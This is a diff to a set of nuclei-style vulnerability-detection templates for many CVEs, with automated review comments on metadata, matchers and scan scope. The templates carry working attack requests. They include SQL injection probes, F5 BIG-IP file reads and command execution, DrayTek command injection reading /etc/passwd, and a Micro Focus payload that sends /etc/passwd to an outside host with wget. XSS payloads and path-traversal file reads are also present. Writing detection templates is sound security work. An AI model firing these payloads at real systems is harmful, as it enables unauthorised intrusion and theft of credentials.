@@ -24,6 +22,34 @@ requests: Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n Upgrade-Insecure-Requests: 1 + - | + POST /ebook/cart.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 + Connection: close + Cache-Control: max-age=0 + Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4 + Content-Type: application/x-www-form-urlencoded + Content-Length: 57 + Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 + + bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart + + - | + GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 + Connection: close + Cache-Control: max-age=0 + Referer: http://{{Hostname}}/ebook/books.php + Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on + matchers: - type: word part: body diff --git a/poc/cve/CVE-2020-5515.yaml b/poc/cve/CVE-2020-5515.yaml old mode 100755 new mode 100644 diff --git a/poc/cve/CVE-2020-5902.yaml b/poc/cve/CVE-2020-5902.yaml index fe6dc5ec18..c0507f572f 100644 --- a/poc/cve/CVE-2020-5902.yaml +++ b/poc/cve/CVE-2020-5902.yaml 
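Review bot: The two added raw requests hard-code `Content-Length: 57` and fixed `Cookie: PHPSESSID=…` values, so the length goes stale as soon as the body is edited and the session identifiers, captured elsewhere, mean nothing on the scanned host. I would remove the `Content-Length` and `Cookie` lines from both requests and let the engine fill in the length. The matchers that evaluate these responses continue below the hunk, so it is worth confirming that they still apply to all three requests. The first hunk of this file also introduces the typo `successfull` in `description` and lowers `severity` from `critical` to `high` without a stated reason.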
@@ -1,62 +1,85 @@ id: CVE-2020-5902 info: - name: F5 BIG-IP TMUI RCE - author: madrobot & dwisiswant0 - severity: high + name: F5 BIG-IP TMUI - Remote Code Execution + author: madrobot,dwisiswant0,ringo + severity: critical + description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + reference: + - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html + - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html + - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html + - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/ + - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 + - https://support.f5.com/csp/article/K52145254 + - https://swarm.ptsecurity.com/rce-in-f5-big-ip/ + - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ + - https://www.kb.cert.org/vuls/id/290915 + - https://nvd.nist.gov/vuln/detail/CVE-2020-5902 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 + epss-score: 0.97562 + tags: cve2020,bigip,rce,kev,packetstorm,cve + metadata: + max-request: 8 -requests: +http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" + - 
"{{BaseURL}}/hsqldb%0a" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "BIG-IP release ([\\d.]+)" - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" + - "HSQL Database Engine Servlet" condition: or - part: body + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=create%20cli%20alias%20private%20list%20command%20bash - | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=list%20%2Ftmp%2Fnonexistent - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=delete%20cli%20alias%20private%20list + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "h3ll0_w0Rld" \ No newline at end of file + - "h3ll0_w0Rld" + +# Enhanced by mp on 2022/04/28 diff --git a/poc/cve/CVE-2020-8115.yaml b/poc/cve/CVE-2020-8115.yaml index b404c7d217..34775d22a2 100644 --- a/poc/cve/CVE-2020-8115.yaml +++ b/poc/cve/CVE-2020-8115.yaml @@ -1,4 +1,4 @@ -id: cve-2020-8115 +id: CVE-2020-8115 info: name: Revive Adserver XSS diff --git a/poc/cve/CVE-2020-8191.yaml b/poc/cve/CVE-2020-8191.yaml index 137397c3ee..87c0635817 100644 --- a/poc/cve/CVE-2020-8191.yaml +++ b/poc/cve/CVE-2020-8191.yaml 
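Review bot: The second request block of this template changes state on the scanned device (it creates a CLI alias and writes `/tmp/nonexistent` through `fileSave.jsp`), and the final request only deletes the alias, so the file stays behind; nothing in the new `tags` line tells an operator that. I would mark the template so it can be excluded from routine scans of production systems, for example `tags: cve2020,bigip,rce,kev,packetstorm,cve,intrusive` if the scanner's tag conventions include `intrusive`, and add a comment above the `raw:` block saying that it writes to the target. The first matcher block also loses its explicit `part: body`; keeping it documents where the four patterns are expected.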
@@ -1,48 +1,33 @@ id: CVE-2020-8191 info: - name: Citrix ADC/Gateway - Cross-Site Scripting + name: Citrix ADC & NetScaler Gateway Reflected XSS + # Leads to RCE author: dwisiswant0 - severity: medium - description: | - Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. - reference: - - https://support.citrix.com/article/CTX276688 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8191 - cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss - metadata: - max-request: 1 + severity: high -http: +requests: - raw: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot - matchers-condition: and matchers: - type: word words: - "" part: body - - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/09/02 diff --git a/poc/cve/CVE-2020-8515.yaml b/poc/cve/CVE-2020-8515.yaml index 05ec699777..21148d4956 100644 --- a/poc/cve/CVE-2020-8515.yaml +++ b/poc/cve/CVE-2020-8515.yaml 
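Review bot: Removing `matchers-condition: and` leaves the word and status matchers combined with the engine default, which in nuclei is `or`, so a bare `200` response to `POST /menu/stapp` is enough to report a high-severity finding. The CVE-2020-8982 hunk further down drops the same line and has the same effect. I would restore `matchers-condition: and` in both and keep the `text/html` header matcher here. As shown on this page the word matcher is an empty string (`- ""`), possibly an extraction artefact; if it is really empty in the file it matches every body. The added `Content-Length: 96` is better left to the engine.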
@@ -5,21 +5,19 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. - reference: + reference: | - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-8515 - cwe-id: CWE-78 requests: - raw: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a diff --git a/poc/cve/CVE-2020-8644.yaml b/poc/cve/CVE-2020-8644.yaml index 6d66fa8fa8..9f91299c9c 100644 --- a/poc/cve/CVE-2020-8644.yaml +++ b/poc/cve/CVE-2020-8644.yaml @@ -32,7 +32,7 @@ requests: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= cookie-reuse: true - host-redirects: true + redirects: true max-redirects: 2 extractors: - type: xpath @@ -55,4 +55,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/07 \ No newline at end of file +# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/CVE-2020-8982.yaml b/poc/cve/CVE-2020-8982.yaml index 93cb4b4014..f666b4e92d 100644 --- a/poc/cve/CVE-2020-8982.yaml +++ b/poc/cve/CVE-2020-8982.yaml 
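Review bot: `reference: |` in poc/cve/CVE-2020-8515.yaml turns the two URLs into one literal block string whose lines begin with `- `, instead of the YAML sequence the old `reference:` key held, so anything that reads references as a list gets a single blob. Keep plain `reference:` with the two `- https://…` items beneath it. The hunk also deletes the classification block (`cvss-score: 9.80`, `cwe-id: CWE-78`), which is what a triager uses to rank a finding marked `severity: critical`; I would keep it. The request block runs past the end of the hunk, so the matchers cannot be checked from here.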
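Review bot: Replacing `host-redirects: true` with `redirects: true` in poc/cve/CVE-2020-8644.yaml lets the engine follow a redirect to any host rather than only the scanned one, while `cookie-reuse: true` is on and the request posts a CSRF token. A target that answers with an off-host `Location` would pull the scan outside the authorised scope. Unless the older key is required for engine compatibility, keep `host-redirects: true` next to `max-redirects: 2`. The request block starts before this hunk, so only the option lines are visible.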
@@ -1,44 +1,23 @@ id: CVE-2020-8982 info: - name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read + name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read author: dwisiswant0 severity: high - description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. - reference: - - https://support.citrix.com/article/CTX269106 - - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view - - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8982 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-8982 - cwe-id: CWE-22 - cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* - epss-score: 0.72182 - tags: cve,cve2020,citrix,lfi - metadata: - max-request: 1 -http: +requests: - method: GET path: - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" - matchers-condition: and matchers: - + - type: status + status: + - 200 - type: word - part: body words: - "bit app support" - "fonts" - "extensions" condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/27 + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2021-20150.yaml b/poc/cve/CVE-2021-20150.yaml index 07d01288a7..deb050990a 100644 --- a/poc/cve/CVE-2021-20150.yaml +++ b/poc/cve/CVE-2021-20150.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + remediation: | + Update the router firmware to the latest version to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 @@ -12,12 +14,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-20150 - cwe-id: CWE-287 + cwe-id: CWE-306 + epss-score: 0.14411 + epss-percentile: 0.95182 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: trendnet + product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,tenable,cve,cve2021,trendnet -requests: +http: - raw: - | POST /apply_sec.cgi HTTP/1.1 @@ -27,10 +35,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -45,12 +49,16 @@ requests: words: - "text/html" + - type: status + status: + - 200 + extractors: - type: regex - part: body name: password group: 1 regex: - '' + part: body -# Enhanced by mp on 2022/04/05 +# digest: 490a00463044022046aa199ad85133757e14eb580e9862b4e41bbef8b9ccca9b8a8807d4e9c3bd7402206bcef1ad451255b30a7ddb6567fe3de67ec1e2f13aee3d8e3c6196853b649663:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-21816.yaml b/poc/cve/CVE-2021-21816.yaml index 1454d889c9..976e4d98e1 100644 --- a/poc/cve/CVE-2021-21816.yaml +++ b/poc/cve/CVE-2021-21816.yaml 
@@ -1,19 +1,24 @@ id: CVE-2021-21816 info: - name: D-LINK DIR-3040 - Syslog Information Disclosure - description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. + name: D-Link DIR-3040 1.13B03 - Information Disclosure author: gy741 severity: medium - reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - tags: cve,cve2021,dlink,exposure,router,syslog + description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21816 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-21816 cwe-id: CWE-922 + epss-score: 0.00237 + tags: cve,cve2021,dlink,exposure,router,syslog + metadata: + max-request: 1 -requests: +http: - method: GET path: - "{{BaseURL}}/messages" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/02/01 diff --git a/poc/cve/CVE-2021-22502.yaml b/poc/cve/CVE-2021-22502.yaml index a321359dd9..836561af0f 100644 --- a/poc/cve/CVE-2021-22502.yaml +++ b/poc/cve/CVE-2021-22502.yaml 
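Review bot: The new `description` in poc/cve/CVE-2021-21816.yaml says an attacker can "modify data, and/or execute unauthorized operations", which the vector kept in the same hunk (`C:L/I:N/A:N`, `cvss-score: 4.3`) does not support. A reader triaging from the description would over-rate the finding. I would limit it to what the vector states, for example `description: D-Link DIR-3040 1.13B03 discloses sensitive information through its Syslog functionality in response to a crafted HTTP request.`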
@@ -1,14 +1,12 @@ id: CVE-2021-22502 - info: name: Micro Focus Operation Bridge Reporter (OBR) RCE author: pikpikcu severity: critical reference: | - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502 + https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502 tags: cve,cve2021,obr,rce - requests: - raw: - | @@ -25,18 +23,15 @@ requests: {"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"} matchers-condition: and matchers: - - type: word words: - "application/json" part: header - - type: word words: - "An error occurred. Please contact your system administrator" part: body condition: and - - type: status status: - 401 diff --git a/poc/cve/CVE-2021-24286.yaml b/poc/cve/CVE-2021-24286.yaml index e3b6286721..44f7dffcf1 100644 --- a/poc/cve/CVE-2021-24286.yaml +++ b/poc/cve/CVE-2021-24286.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24286 - info: name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting author: geeknik @@ -7,12 +6,10 @@ info: reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 severity: medium tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and matchers: - type: word diff --git a/poc/cve/CVE-2021-3017.yaml b/poc/cve/CVE-2021-3017.yaml index 0967f3f37a..5a60c6d460 100644 --- a/poc/cve/CVE-2021-3017.yaml +++ b/poc/cve/CVE-2021-3017.yaml 
@@ -4,8 +4,15 @@ info: name: Intelbras WIN 300/WRN 342 Disclosure author: pikpikcu severity: high - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - tags: cve,cve2021,exposure + description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + reference: + - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 + tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET @@ -17,9 +24,16 @@ requests: - type: word words: - 'def_wirelesspassword =' - - 'def_SSID =' + - 'Roteador Wireless' part: body + condition: and - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' diff --git a/poc/cve/CVE-2021-31537.yaml b/poc/cve/CVE-2021-31537.yaml index 0e40527eea..128ba7c301 100644 --- a/poc/cve/CVE-2021-31537.yaml +++ b/poc/cve/CVE-2021-31537.yaml 
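Review bot: The extractor added in the second hunk of poc/cve/CVE-2021-3017.yaml has a capture group in `'def_wirelesspassword = "([A-Za-z0-9=]+)";'` but no `group: 1`, so the whole matched statement is emitted rather than the value; add `group: 1` under the extractor. The class `[A-Za-z0-9=]` also skips values containing other characters, in which case the matcher fires with nothing extracted. Whatever is extracted is the device's wireless password in clear text, so results from this template should be stored and shared as credentials. In the matcher, swapping `'def_SSID ='` for `'Roteador Wireless'` under `condition: and` ties detection to one interface-language string, which may miss devices that render a different one; that cannot be verified from the hunk.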
@@ -3,7 +3,7 @@ id: CVE-2021-31537 info: name: SIS-REWE GO version 7.5.0/12C XSS author: geeknik - description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss @@ -19,9 +19,6 @@ requests: part: body words: - "" - - "SIS-REWE" - condition: and - - type: word part: header words: diff --git a/poc/cve/CVE-2021-35587.yaml b/poc/cve/CVE-2021-35587.yaml index 1ca9fa3b33..d49530cc45 100644 --- a/poc/cve/CVE-2021-35587.yaml +++ b/poc/cve/CVE-2021-35587.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 
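Review bot: Deleting `- "SIS-REWE"` and `condition: and` from the body matcher in the second hunk of poc/cve/CVE-2021-31537.yaml leaves only the reflected string as evidence, so any application that echoes the parameter would be reported as SIS-REWE Go. Keep the product marker as a second word with `condition: and` so the finding stays tied to the affected product. The `matchers-condition` line lies outside the hunk, so how the body and header matchers combine cannot be confirmed from here.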
@@ -15,34 +17,40 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35587 cwe-id: CWE-502 + epss-score: 0.95643 + epss-percentile: 0.99236 + cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: verified: true - fofa-query: body="/oam/pages/css/login_page.css" + max-request: 1 + vendor: oracle + product: access_manager shodan-query: http.title:"Oracle Access Management" + fofa-query: body="/oam/pages/css/login_page.css" tags: cve,cve2021,oam,rce,java,unauth,oracle,kev -requests: +http: - method: GET path: - '{{BaseURL}}/oam/server/opensso/sessionservice' matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - "x-oracle-dms-ecid" - "x-oracle-dms-rid" - condition: or case-insensitive: true + condition: or - type: word part: body words: - "/oam/pages/css/general.css" -# Enhanced by mp on 2022/05/02 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f6d73f1b41fdd1bfc1b430b7a051be821dc893567b2af11c759ad99ae192ca6d022079a7aff657604ea86a0c43894e1765c8c1e76ed07c59ea7eca41c17ae9c34b58:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-45967.yaml b/poc/cve/CVE-2021-45967.yaml index c8cfdf156a..320288e546 100644 --- a/poc/cve/CVE-2021-45967.yaml +++ b/poc/cve/CVE-2021-45967.yaml 
@@ -5,21 +5,30 @@ info: author: dwisiswant0 severity: critical description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. + remediation: | + Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html + - https://www.pascom.net/doc/en/release-notes/pascom19/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45967 - cwe-id: CWE-918 + cwe-id: CWE-22 + epss-score: 0.73933 + epss-percentile: 0.97807 + cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: pascom_cloud_phone_system tags: cve,cve2021,pascom,ssrf -requests: +http: - method: GET path: - - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS) + - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" matchers-condition: and matchers: @@ -32,4 +41,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/28 \ No newline at end of file +# digest: 4a0a00473045022100ae0fa337bee83c96cd964ba9806623c708bb01ba80afc023519cfe76e27f30d9022063e92e6ae040abae6dcf35cf8a2b9be6e27b5820514a0faad39a74ceba8c87f0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-0378.yaml b/poc/cve/CVE-2022-0378.yaml index 9cce944e5f..0c129e0017 100644 --- a/poc/cve/CVE-2022-0378.yaml +++ b/poc/cve/CVE-2022-0378.yaml 
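Review bot: The first hunk of poc/cve/CVE-2021-45967.yaml changes `cwe-id` to `CWE-22` while the description, the added remediation text and the `ssrf` tag still describe server-side request forgery, so the file now classifies the issue two ways. Either keep `cwe-id: CWE-918` or extend the description to explain the path-traversal step that reaches `getFavicon`. The added `cpe` puts `pascom_cloud_phone_system` in the vendor position with a wildcard product, and `metadata` has `vendor` but no `product`, unlike the other templates updated in this patch; both look like generator output that should be checked. The removed inline comment `# Triple parent because endpoint access via backend (parent of index CMS)` was the only explanation of the `..;/..;/..;` prefix and is worth keeping.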
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce @@ -14,21 +16,23 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0378 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.41081 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: microweber + product: microweber shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,xss,huntr -requests: +http: - method: GET path: - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -36,4 +40,8 @@ requests: - 'onmousemove="alert(document.domain)' condition: and -# Enhanced by mp on 2022/02/28 + - type: status + status: + - 200 + +# digest: 4a0a00473045022073a374de7ceaffbdfd2a16e5e6062c867bc98a2d24d7fe891e630bdbe1b6768a022100f8eb1f57e3a27902c7669fe6448f13b83fdcdca373d1b05cd25ae7a9a538be77:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-24682.yaml b/poc/cve/CVE-2022-24682.yaml index d00a7c637f..5418c23eab 100644 --- a/poc/cve/CVE-2022-24682.yaml +++ b/poc/cve/CVE-2022-24682.yaml 
@@ -1,52 +1,52 @@ -id: CVE-2022-24682 - -info: - name: Zimbra Improper Encoding or Escaping of Output - author: rxerium - severity: medium - description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. - metadata: - max-request: 1 - tags: zimbra,kev - -http: - - method: GET - path: - - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Zimbra Collaboration Suite Web Client" - - - type: word - part: header - words: - - "application/x-javascript" - - - type: word - words: - - "8.8" - - "8.8.6" - - "8.8.7" - - "8.8.8" - - "8.8.9" - - "8.8.10" - - "8.8.11" - - "8.8.12" - - "8.8.13" - - "8.8.14" - part: version - - - type: regex - regex: - - "8.8.15p[12]" - - extractors: - - type: regex - part: body - group: 1 - regex: +id: CVE-2022-24682 + +info: + name: Zimbra Improper Encoding or Escaping of Output + author: rxerium + severity: medium + description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. 
